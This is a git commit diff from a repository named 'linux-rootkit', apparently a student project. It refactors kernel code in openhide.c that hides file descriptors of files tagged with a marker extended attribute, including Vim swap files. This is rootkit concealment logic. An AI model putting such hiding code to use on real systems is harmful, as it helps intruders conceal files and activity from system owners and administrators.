linux-rootkit

commit 1566bd56d0414a98e647b6bd8ebf43d7c2c9ee7d
parent 8b364fdc795fecfb51c79ebfdcda9c3968832db7
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 15:27:24 +0100

minimally refactors Vim-swap hack code

Diffstat:
M
src/openhide.c
 | 
52
++++++++++++++++++++++++----------------------------

1 file changed, 24 insertions(+), 28 deletions(-)
diff --git a/src/openhide.c b/src/openhide.c
@@ -115,47 +115,43 @@ fd_callback(const void *ptr, struct file *f, unsigned fd)
         ssize_t len = vfs_getxattr(f->f_path.dentry, G7_XATTR_NAME, buf, BUFLEN);
 
         if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL))) {
-            add_fd_to_list(&hidden_fds, (int) fd);
+            add_fd_to_list(&hidden_fds, (int)fd);
             goto leave;
         }
 
-        const char *fname = f->f_path.dentry->d_name.name;
+        { // Rather hideous hack to account for Vim-{specific,default} swap files
+            const char *fname = f->f_path.dentry->d_name.name;
 
-        if (strlen(fname) >= 6) {
-            char *abs = kzalloc(BUFLEN, GFP_KERNEL);
+            if (strlen(fname) >= 6) {
+                char *abs = kzalloc(BUFLEN, GFP_KERNEL);
 
-            if (strncmp(fname, ".", 1) || strncmp((fname + (strlen(fname) - 4)), ".swp", 4)) {
-                goto leave;
-            }
-
-
-            memset(buf, 0, BUFLEN);
-            strncpy(buf, (fname + 1), strlen(fname) - 5);
-
-            char *path = d_path(&f->f_path, abs, 512);
+                if (strncmp(fname, ".", 1) || strncmp((fname + (strlen(fname) - 4)), ".swp", 4))
+                    goto leave;
 
-            if (IS_ERR(path))
-                goto end;
+                memset(buf, 0, BUFLEN);
+                strncpy(buf, (fname + 1), strlen(fname) - 5);
 
-            memset((path + (strlen(path) - strlen(fname))), 0, strlen(fname));
-            strcat(path, buf);
+                char *pathname = d_path(&f->f_path, abs, 512);
+                if (IS_ERR(pathname))
+                    goto end;
 
-            struct path path_struct;
-            if (kern_path(path, LOOKUP_FOLLOW, &path_struct))
-                goto end;
+                memset((pathname + (strlen(pathname) - strlen(fname))), 0, strlen(fname));
+                strcat(pathname, buf);
 
-            memset(buf, 0, BUFLEN);
+                struct path path;
+                if (kern_path(pathname, LOOKUP_FOLLOW, &path))
+                    goto end;
 
-            ssize_t len = vfs_getxattr(path_struct.dentry, G7_XATTR_NAME, buf, BUFLEN);
+                memset(buf, 0, BUFLEN);
+                ssize_t len = vfs_getxattr(path.dentry, G7_XATTR_NAME, buf, BUFLEN);
 
-            if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL))) {
-                add_fd_to_list(&hidden_fds, (int) fd);
-            }
+                if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL)))
+                    add_fd_to_list(&hidden_fds, (int)fd);
 
 end:
-            kfree(abs);
-            goto leave;
-
+                kfree(abs);
+                goto leave;
+            }
         }
     }